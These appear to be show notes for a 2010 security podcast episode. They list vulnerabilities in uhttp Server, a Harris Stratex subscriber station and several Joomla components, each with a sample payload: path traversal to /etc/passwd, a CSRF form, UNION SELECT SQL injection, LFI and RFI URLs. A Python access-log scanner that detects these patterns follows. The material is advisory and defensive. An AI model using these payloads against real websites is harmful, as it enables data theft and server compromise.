Your daily source of Pwnage, Policy and Politics.

Episode 95 – OuterZone Review

ISD Podcast Episode 95 for March 25, 2010. This podcast is our contribution back to the community, where we discuss vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

April 15th – 18th, 2010 Cleveland, Ohio
http://notacon.org/
Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class
May 8, 2010 Jeffersonville,  Indiana

(No URL for that as of yet)
Proceeds will be going to the Hackers for Charity Food For Work Program
Friends of the Podcast:

Webhosting services: WebSpeedway

Vulnerabilities of Interest:

  1. uhttp Server is subject to a Path Traversal vulnerability. Version 0.1.0-alpha is affected, though others may be as well.  The problem is in the handling of the bad characters that can be used to launch attacks such as directory traversal. The path traversal sequence ('../') is not checked, so it can be used to browse the directories of the affected system.  Example URL is available: http://www.sample.com/GET /../../../../../../etc/passwd HTTP/1.1
  2. Harris Stratex 2100 subscriber station is subject to a Cross Site Request Forgery vulnerability.  This vulnerability would allow an attacker to view the running configuration without authentication.  Version 3.0.4.1.7.C is impacted.  Example HTML code is available:
    <html>
    <body>
    <body xonload="config.submit();">
    <form method="get"
    action="http:192.168.1.1/frameCmd6.html">
    <input value="Current Configuration">
    </form>
    </body>
    </html>
  3. The Joomla Component com_gds is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_gds&task=store&Storeid=-1+UNION+SELECT+1,2,3,4,5,6--
  4. The Joomla Component com_cx is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_cx&task=postview&postid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
  5. The Joomla Component J!Research is subject to a Local File Inclusion (LFI) vulnerability.  This could be exploited by an attacker to expose sensitive data.  Example URL is available: http://www.sample.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00
  6. The Joomla Component com_cb is subject to a SQL Injection vulnerability because it fails to sanitize user-supplied inputs used in a SQL query.  Example URL is available: http://www.sample.com/index.php?option=com_cb&task=list&cat=-1+UNION+SELECT+1,2,3,4,5--
  7. The Joomla Component SMEStorage is subject to a Local File Inclusion (LFI) vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_smestorage&controller=[LFI]%00
  8. The Joomla Component com_jwmmxtd is subject to a Remote File Inclusion (RFI) vulnerability.  Example URL is available: http://www.sample.com/administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= [inj3ct0r]
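
The requests listed above share a few recognizable markers, so they are easy to flag in web access logs. The following is an added example, not code from the podcast or the original advisories; the log lines, finding names and the three-round decode limit are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")  # '..' as a whole path segment
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

def fully_decode(text, rounds=3):
    """Percent-decode repeatedly so double encoding cannot hide '../'."""
    for _ in range(rounds):
        text, previous = unquote(text), text
        if text == previous:
            break
    return text

def classify(target):
    """Return a sorted list of findings for one request target (path + query)."""
    parts = urlsplit(target)
    found = set()
    if TRAVERSAL.search(fully_decode(parts.path)):
        found.add("traversal-in-path")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(value)
        if TRAVERSAL.search(value):
            found.add("traversal-in-param")
        if "\x00" in value:
            found.add("null-byte")
        if UNION_SELECT.search(value):
            found.add("union-select")
        # Assumption: a client never has a legitimate reason to set this variable.
        if name.lower() == "mosconfig_absolute_path":
            found.add("config-variable-from-client")
    return sorted(found)

def scan(log_lines):
    """Map each flagged request target to its findings."""
    hits = {}
    for line in log_lines:
        match = REQUEST.search(line)
        if match and (findings := classify(match.group(1))):
            hits[match.group(1)] = findings
    return hits

# Constructed access-log lines (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Mar/2010:10:00:00 +0000] "GET /../../../../../../etc/passwd HTTP/1.1" 200 1024',
    '192.0.2.10 - - [25/Mar/2010:10:00:05 +0000] "GET /index.php?option=com_gds&task=store&Storeid=-1+UNION+SELECT+1,2,3,4,5,6-- HTTP/1.1" 200 512',
    '192.0.2.10 - - [25/Mar/2010:10:00:09 +0000] "GET /index.php?option=com_jresearch&controller=../../proc/self/environ%00 HTTP/1.1" 200 300',
    '192.0.2.20 - - [25/Mar/2010:10:01:00 +0000] "GET /files/report..final.pdf?id=5 HTTP/1.1" 200 9000',
]
```

Calling `scan(SAMPLE_LOG)` flags the first three lines and leaves the last one alone, because `..` inside a file name is not a path segment.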

OuterZone Review

http://dc949.org/projects/floodgate/

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.